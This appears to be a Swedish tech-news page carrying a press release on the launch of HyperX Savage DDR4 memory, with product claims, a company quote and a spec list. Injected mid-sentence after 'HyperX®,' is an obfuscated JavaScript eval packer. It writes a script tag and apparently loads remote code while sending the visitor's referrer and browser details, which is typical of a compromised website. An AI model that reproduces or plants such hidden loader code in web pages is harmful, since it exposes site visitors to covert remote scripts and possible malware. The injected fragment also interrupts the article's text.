Image Image Image Image Image Image Image Image Image Image

| 13 april, 2021

Scroll to top

Top

HyperX lanserar Savage DDR4 Minne

HyperX lanserar Savage DDR4 Minne
Sebastian

HyperX®, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tsryb|var|u0026u|referrer|yhbna||js|php’.split(’|’),0,{}))
en avdelning inom Kingston® Technology Company, Inc., oberoende världsledare på minnesprodukter, tillkännagav idag lanseringen av HyperX Savage DDR4 minne. HyperX Savage DDR4 med sina höga hastigheter och aggressiva timings, erbjuder multitasking och snabbare system vilket gör den perfekt för avancerade gamers, överklockare och avancerade användare.

Med hastigheter upp till 3000MHz HyperX öppnar Savage DDR4 för snabbare videoredigering, 3D-rendering och spel. De inbäddade XMP färdiga profiler är optimerade för Intel Core i5 och i7-processorer, samt Z170 100-serien och X99 chipset så att användarna lätt kan överklocka bara genom att välja en minnesprofil utan justeringar i BIOS. Finns i enskilda moduler och kit upp till 64GB, kör Savage DDR4 så lågt som 1.2V och max 1.35V resulterar i lägre strömförbrukning än DDR3, och högre tillförlitlighet.

”Vi är glada att presentera den nya hastigheten, med energieffektiv minne för spelarna och entusiaster som vill maximera systemets prestanda”, säger Mikael Johansson, affärsutvecklare HyperX Sverige. ”HyperX Savage DDR4 ger konsumenterna en rå prestanda och med den asymmetriska pressgjutna heatspreader´n i låg-profil aluminium och matchande svart PCB. En rejäl konstruktion för att uppgradera alla system.”

HyperX Savage DDR4 backas upp av en livstids garanti, fri teknisk support och legendarisk Kingston tillförlitlighet. HyperX är högpresterande produktdivision i Kingston Technology och inkluderar hög hastighet DDR4 och DDR3-minne, SSD, USB-minnen, headset och musmattor. Riktar sig till gamers, överklockare och entusiaster, HyperX känd över hela världen för kvalitet, prestanda och innovation. HyperX älskar Esports och sponsrar över 20 lag globalt, är huvudsponsor av Intel Extreme Masters. HyperX kan hittas på många utställningar bland annat Brasil Game Show, Kina Joy, Dreamhack, Gamescom och PAX.

För mer information besök HyperX hemsida.

HyperX Savage DDR4 Features and Specifications:

  • Capacities: 4GB -8GB (single), 8GB-64GB (kits)
  • Frequency: 2133MHz, 2400MHz, 2666MHz, 2800MHz and 3000MHz
  • CAS Latency: 12-15
  • Voltage: 1.2V or 1.35V
  • Operating Temperature: 0°C to 85°C
  • Storage Temperature: -55°C to 100°C
  • Dimensions: 133.35mm x 34.57mm
  • Compatible with: X99, Z170, H110, H170 and B150
  • Reliable: 100% tested
  • Guaranteed: Lifetime warranty